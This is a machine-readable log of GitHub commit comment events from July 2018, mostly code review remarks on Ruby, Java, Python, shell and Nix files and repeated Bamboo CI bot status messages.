{"id":"8039517544","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891801,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-30T18:36:18Z","updated_at":"2018-07-30T18:36:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:36:18Z"}
{"id":"8039517887","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891802,"position":9,"line":9,"path":"Part_5/main.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:36:22Z","updated_at":"2018-07-30T18:36:22Z","author_association":"NONE","body":"далее есть уже более сложные варианты улучшения, сам смотри, готов ли ты тратить на это время\r\nочень рекомендуется разделять логику и интерфейс (т.е. инпут и аутпут)\r\nдругими словами - все \"путсы\" и \"гетсы\" можно вынести в отдельный класс, назвать его к примеру `Interface`, инициализировать инстанс этого класса в классе `Main` (`@interface = Interface.new`) и далее вместо прямых вызовов \"путс\", \"гетс\" вызывать в Мэйн методы в следующем стиле: `@interface.show_trains`, `route_number = @interface.ask_route_number`"}},"created_at":"2018-07-30T18:36:22Z"}
{"id":"8039523251","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29891819,"position":null,"line":null,"path":null,"commit_id":"3d9ab9ee197e56f58ea27aa429a35278fa9d7a4a","created_at":"2018-07-30T18:37:21Z","updated_at":"2018-07-30T18:37:21Z","author_association":"MEMBER","body":"Could you point me to the script and I'll take a peek?"}},"created_at":"2018-07-30T18:37:21Z"}
{"id":"8039524222","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891822,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-30T18:37:30Z","updated_at":"2018-07-30T18:37:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:37:30Z"}
{"id":"8039527368","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29891823,"position":null,"line":null,"path":null,"commit_id":"18d0e5e133e9a99fac4b532a9cd3aaf66752a526","created_at":"2018-07-30T18:38:01Z","updated_at":"2018-07-30T18:38:01Z","author_association":"MEMBER","body":"Thanks, @joewiz!"}},"created_at":"2018-07-30T18:38:01Z"}
{"id":"8039530679","type":"CommitCommentEvent","actor":{"login":"Infinisil"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29891832,"position":47,"line":38,"path":"nixos/modules/services/security/cfssl.nix","commit_id":"16a3ed4dc4404cabc644ce8a7eb80b12de118e23","created_at":"2018-07-30T18:38:36Z","updated_at":"2018-07-30T18:38:36Z","author_association":"CONTRIBUTOR","body":"`ca` and `caKey` should still be `types.str`, since `types.path` won't accept the `env:varname/[file:]fname` syntax."}},"created_at":"2018-07-30T18:38:36Z"}
{"id":"8039531146","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891833,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-30T18:38:41Z","updated_at":"2018-07-30T18:38:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:38:41Z"}
{"id":"8039535041","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnX-SI/GeoNature"},"payload":{"comment":{"id":29891841,"position":null,"line":null,"path":null,"commit_id":"f124d81e766b0bdd2700a2d514429e12c3dce5c9","created_at":"2018-07-30T18:39:23Z","updated_at":"2018-07-30T18:39:23Z","author_association":"MEMBER","body":"Cool. Bonne fonctionnalité. \nMais je me demandais si depuis la Synthese on faisait un lien vers l'édition ou juste vers sa fiche détail dans son appli source. \nEt c'est au niveau de sa fiche source et en fonction de son CRUVED que l'utilisateur a accès ou non aux boutons de modification et suppression de l'objet."}},"created_at":"2018-07-30T18:39:23Z"}
{"id":"8039537081","type":"CommitCommentEvent","actor":{"login":"thaichessswinboard"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29891845,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-30T18:39:46Z","updated_at":"2018-07-30T18:39:46Z","author_association":"NONE","body":"Yes that how computer thinking but normaly people who play Makruk they will take rook to capture Bishop not think like program and they will move king to another conner that KNQK doesn't know checkmate. But The  game i show you it just do like my is have advancetage and play defensive program it will be win by move position like that if program doesn't take a Rook to capture Bishop it have more chance to win the game. Win by little. at the real game some position near the conner it will make stockfish lost the game it from the middle position on the Board it will more move like I try. When you have more time I think you can solve the problem. I am sure you can do it. I just compare how computer program think it doesn't like human think it safety from Endgame Values it will think wrong. Many thank to read my comment.\r\n\r\nRegaurd \r\n\r\nPcst."}},"created_at":"2018-07-30T18:39:46Z"}
{"id":"8039537729","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891846,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-30T18:39:53Z","updated_at":"2018-07-30T18:39:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:39:53Z"}
{"id":"8039538927","type":"CommitCommentEvent","actor":{"login":"zoldello"},"repo":{"name":"ENCODE-DCC/encoded"},"payload":{"comment":{"id":29891848,"position":11,"line":11,"path":"src/encoded/tests/test_stage_one_searchview.py","commit_id":"04474ad6676c596331149a9412b1996125908611","created_at":"2018-07-30T18:40:08Z","updated_at":"2018-07-30T18:40:08Z","author_association":"CONTRIBUTOR","body":"How about: return \"searchTerm={}\".format('&searchTerm='.join(search_terms)) if search_terms else ‘’"}},"created_at":"2018-07-30T18:40:08Z"}
{"id":"8039539001","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891849,"position":13,"line":13,"path":"Part_5/main.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:40:09Z","updated_at":"2018-07-30T18:40:09Z","author_association":"NONE","body":"попробовал поработать с программой, довольно быстро словил вот такой вылет:\r\n```\r\nВведите 1, добавить станцию к маршруту\r\nВведите 2, удалить станцию из маршрута\r\nВведите 3, назначит маршрут поезду\r\nВведите 4, прицепить вагон поезду\r\nВведите 5, отцепить вагон поезду\r\nВведите 6, переместить поезд вперёд на станцию\r\nВведите 7, переместить поезд назад на станцию\r\nВведите 0, Выход\r\n3\r\nВыберите порядковый номер поезда:\r\n11122\r\n11122\r\nВыберите порядковый номер маршрута:\r\n11222\r\nTraceback (most recent call last):\r\n\t5: from main.rb:143:in `<main>'\r\n\t4: from main.rb:143:in `loop'\r\n\t3: from main.rb:153:in `block in <main>'\r\n\t2: from main.rb:55:in `operations'\r\n\t1: from main.rb:55:in `loop'\r\nmain.rb:90:in `block in operations': undefined method `add_route' for nil:NilClass (NoMethodError)\r\n```\r\nвозможно, если поэкспериментировать с другими объектами, то можно наткнуться на подобные ошибки\r\nсвязан этот вылет, как видно, с тем, что нет проверки на существование объекта\r\nбыло бы правильней ее добавить, для всех объектов"}},"created_at":"2018-07-30T18:40:09Z"}
{"id":"8039540148","type":"CommitCommentEvent","actor":{"login":"LordEphidel"},"repo":{"name":"TheOneric/ExPIIIb"},"payload":{"comment":{"id":29891854,"position":null,"line":null,"path":null,"commit_id":"b4a1f8aea89fa0e0be21ab839099f34607638183","created_at":"2018-07-30T18:40:21Z","updated_at":"2018-07-30T18:40:21Z","author_association":"COLLABORATOR","body":"Sorry.... Hab den Checkout vergessen..."}},"created_at":"2018-07-30T18:40:21Z"}
{"id":"8039543844","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891863,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-30T18:41:03Z","updated_at":"2018-07-30T18:41:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:41:03Z"}
{"id":"8039545180","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891869,"position":75,"line":1623,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:41:17Z","updated_at":"2018-07-30T18:41:17Z","author_association":"NONE","body":"Quote $1 since space can be present"}},"created_at":"2018-07-30T18:41:17Z"}
{"id":"8039545213","type":"CommitCommentEvent","actor":{"login":"ringote"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29891870,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T18:41:18Z","updated_at":"2018-07-30T18:41:18Z","author_association":"NONE","body":"O modo de instalação desse módulo é feita como ?\n\n\nHelio Gonzaga Santos Júnior\n\nDesenvolvedor Front-End\n\nContato: (11)94634-8975\n"}},"created_at":"2018-07-30T18:41:18Z"}
{"id":"8039546937","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891875,"position":76,"line":1624,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:41:35Z","updated_at":"2018-07-30T18:41:35Z","author_association":"NONE","body":"trace_patch should be quoted here."}},"created_at":"2018-07-30T18:41:35Z"}
{"id":"8039548274","type":"CommitCommentEvent","actor":{"login":"zoldello"},"repo":{"name":"ENCODE-DCC/encoded"},"payload":{"comment":{"id":29891884,"position":30,"line":30,"path":"src/encoded/tests/test_stage_one_searchview.py","commit_id":"04474ad6676c596331149a9412b1996125908611","created_at":"2018-07-30T18:41:49Z","updated_at":"2018-07-30T18:41:49Z","author_association":"CONTRIBUTOR","body":"strings are immutable. So concatenating builds a new string. It is better to build a list, and then convert the list to a string"}},"created_at":"2018-07-30T18:41:49Z"}
{"id":"8039550357","type":"CommitCommentEvent","actor":{"login":"haberc"},"repo":{"name":"flowin-ibm/website"},"payload":{"comment":{"id":29891890,"position":null,"line":null,"path":null,"commit_id":"9446682abc7095f4c19ab49a30acbe5c72e57d06","created_at":"2018-07-30T18:42:12Z","updated_at":"2018-07-30T18:42:12Z","author_association":"CONTRIBUTOR","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/b5fbd4e7-2cf5-46fe-b349-6646d1cf8d04?env_id=ibm%3Ayp%3Aeu-gb \"flowin-website-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/585f8993-389c-496f-ac44-9008022cf5e6?env_id=ibm%3Ayp%3Aeu-gb \"flowin-website-toolchain\") deployed [website](https://github.com/flowin-ibm/website/releases/tag/deploy-ibm-yp-eu-gb-flood.prevention.bb-gmail.com-dev-20180730-184211 \"deploy-ibm-yp-eu-gb-flood.prevention.bb-gmail.com-dev-20180730-184211\") to [dev](https://console.bluemix.net/apps/f4aadab3-79df-4cbc-abc4-f714b8f18659?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:flood.prevention.bb@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-30T18:42:12Z"}
{"id":"8039550633","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891891,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-30T18:42:15Z","updated_at":"2018-07-30T18:42:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:42:15Z"}
{"id":"8039550882","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29891893,"position":43,"line":420,"path":"source/gameengine/Ketsji/KX_Mesh.cpp","commit_id":"59d33db590c41d98e8b04d17c80d2f3e355d8d62","created_at":"2018-07-30T18:42:18Z","updated_at":"2018-07-30T18:42:18Z","author_association":"COLLABORATOR","body":"And it compiled in msvc 2017..."}},"created_at":"2018-07-30T18:42:18Z"}
{"id":"8039550996","type":"CommitCommentEvent","actor":{"login":"rbclark"},"repo":{"name":"projecttacoma/cqm-execution-service"},"payload":{"comment":{"id":29891894,"position":6,"line":6,"path":"Dockerfile","commit_id":"261440e0015cdcaa101922cc306cac5efb5971e7","created_at":"2018-07-30T18:42:19Z","updated_at":"2018-07-30T18:42:19Z","author_association":"NONE","body":"I would suggest building this using dockerhub and then pulling the built images down locally in order to avoid this."}},"created_at":"2018-07-30T18:42:19Z"}
{"id":"8039551566","type":"CommitCommentEvent","actor":{"login":"johanot"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29891898,"position":47,"line":38,"path":"nixos/modules/services/security/cfssl.nix","commit_id":"16a3ed4dc4404cabc644ce8a7eb80b12de118e23","created_at":"2018-07-30T18:42:26Z","updated_at":"2018-07-30T18:42:26Z","author_association":"CONTRIBUTOR","body":"Right.. Fixed."}},"created_at":"2018-07-30T18:42:26Z"}
{"id":"8039551762","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29891900,"position":null,"line":null,"path":null,"commit_id":"7368dd8e7d4fd9eb23207ff8dbb2a675fe33e7ab","created_at":"2018-07-30T18:42:28Z","updated_at":"2018-07-30T18:42:28Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/help-us-build-the-new-dashboard/86468/259\n"}},"created_at":"2018-07-30T18:42:28Z"}
{"id":"8039556756","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891919,"position":83,"line":1631,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:43:24Z","updated_at":"2018-07-30T18:43:24Z","author_association":"NONE","body":"This is necessary.\r\n\r\nReturn values aren't used."}},"created_at":"2018-07-30T18:43:24Z"}
{"id":"8039556827","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891920,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-30T18:43:25Z","updated_at":"2018-07-30T18:43:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:43:25Z"}
{"id":"8039562677","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891939,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-30T18:44:36Z","updated_at":"2018-07-30T18:44:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:44:36Z"}
{"id":"8039566216","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891949,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-30T18:45:15Z","updated_at":"2018-07-30T18:45:15Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-30T18:45:15Z"}
{"id":"8039566708","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891952,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-30T18:45:21Z","updated_at":"2018-07-30T18:45:21Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-30T18:45:21Z"}
{"id":"8039566979","type":"CommitCommentEvent","actor":{"login":"thiagosantos"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29891956,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T18:45:24Z","updated_at":"2018-07-30T18:45:24Z","author_association":"OWNER","body":"Baixando o ZIP e extraindo na raiz do Magento."}},"created_at":"2018-07-30T18:45:24Z"}
{"id":"8039568037","type":"CommitCommentEvent","actor":{"login":"zoldello"},"repo":{"name":"ENCODE-DCC/encoded"},"payload":{"comment":{"id":29891958,"position":44,"line":44,"path":"src/encoded/tests/test_stage_one_searchview.py","commit_id":"04474ad6676c596331149a9412b1996125908611","created_at":"2018-07-30T18:45:37Z","updated_at":"2018-07-30T18:45:37Z","author_association":"CONTRIBUTOR","body":"better to use \">=300 and <=399\", to make it clear you are talking about HTTP redirect. You may also want to add a comment.  "}},"created_at":"2018-07-30T18:45:37Z"}
{"id":"8039569467","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891962,"position":433,"line":433,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:45:53Z","updated_at":"2018-07-30T18:45:53Z","author_association":"NONE","body":"Remove empty line."}},"created_at":"2018-07-30T18:45:53Z"}
{"id":"8039570627","type":"CommitCommentEvent","actor":{"login":"sashadg14"},"repo":{"name":"gooodbo/zamena.v.file"},"payload":{"comment":{"id":29891970,"position":26,"line":26,"path":"src/com/sqirt/na/lico/Togreatcoder.java","commit_id":"f48dab5ad2f74850ed43b5d06b84e17b4d45ddcd","created_at":"2018-07-30T18:46:07Z","updated_at":"2018-07-30T18:46:07Z","author_association":"NONE","body":"Вот этого вот понять не могу, ты создаёшь  FileWriter который не юзаешь можно сказать и BufferedWriter тоже, который пересоздаётся с новым FileWriter ниже, дичь какая-то. Оптимизируй это дерьмо"}},"created_at":"2018-07-30T18:46:07Z"}
{"id":"8039570861","type":"CommitCommentEvent","actor":{"login":"sashadg14"},"repo":{"name":"gooodbo/zamena.v.file"},"payload":{"comment":{"id":29891971,"position":6,"line":6,"path":"src/com/sqirt/na/lico/Togreatcoder.java","commit_id":"f48dab5ad2f74850ed43b5d06b84e17b4d45ddcd","created_at":"2018-07-30T18:46:10Z","updated_at":"2018-07-30T18:46:10Z","author_association":"NONE","body":"1) какого х*я всё в одном методе\r\n2) разбей всё на методы поменьше\r\n3) Scanner тоже надо закрывать методом close(), учись закрывать всё буфера, потоки чтения/записи и т.д. ибо если не закрыть, то потом могут быть проблемы с ресурсом, с которым они работают\r\n4) называй переменные нормально, а не fw, bw и т.д.\r\n5) путь к файлу я хочу чтоб был не захардкожен, а передавался как аргумент при запуске твоей скомпиленой проги"}},"created_at":"2018-07-30T18:46:10Z"}
{"id":"8039571812","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891973,"position":526,"line":526,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:46:20Z","updated_at":"2018-07-30T18:46:20Z","author_association":"NONE","body":"remove empty line"}},"created_at":"2018-07-30T18:46:20Z"}
{"id":"8039572522","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29891974,"position":11,"line":11,"path":"quiz/src/main/java/ru/serdar1980/condig/Csv.java","commit_id":"9889fb7e8dd6859e98d3756f4b4df4e69b6a5b6a","created_at":"2018-07-30T18:46:28Z","updated_at":"2018-07-30T18:46:28Z","author_association":"NONE","body":"Ну не совсем. Лучше разделять `@Configuration`-бины и `@ConfigurationProperties`. Просто у наих разная ответственность. У одного - содержать бины, у второго - конфигурацийонные свойства."}},"created_at":"2018-07-30T18:46:28Z"}
{"id":"8039572813","type":"CommitCommentEvent","actor":{"login":"zoldello"},"repo":{"name":"ENCODE-DCC/encoded"},"payload":{"comment":{"id":29891975,"position":21,"line":21,"path":"src/encoded/tests/test_stage_one_searchview.py","commit_id":"04474ad6676c596331149a9412b1996125908611","created_at":"2018-07-30T18:46:32Z","updated_at":"2018-07-30T18:46:32Z","author_association":"CONTRIBUTOR","body":"name does not explain what the private method does"}},"created_at":"2018-07-30T18:46:32Z"}
{"id":"8039574565","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29891984,"position":22,"line":22,"path":"quiz/src/main/java/ru/serdar1980/service/QuizShellServiceImpl.java","commit_id":"9889fb7e8dd6859e98d3756f4b4df4e69b6a5b6a","created_at":"2018-07-30T18:46:50Z","updated_at":"2018-07-30T18:46:50Z","author_association":"NONE","body":"Всё так"}},"created_at":"2018-07-30T18:46:50Z"}
{"id":"8039577177","type":"CommitCommentEvent","actor":{"login":"CaioCeretta"},"repo":{"name":"CaioCeretta/DAO-PDO"},"payload":{"comment":{"id":29891994,"position":2,"line":2,"path":"class/Usuario.php","commit_id":"01d11694845d6a3d1e1f54e118a5804821341036","created_at":"2018-07-30T18:47:20Z","updated_at":"2018-07-30T18:47:20Z","author_association":"OWNER","body":"Teste"}},"created_at":"2018-07-30T18:47:20Z"}
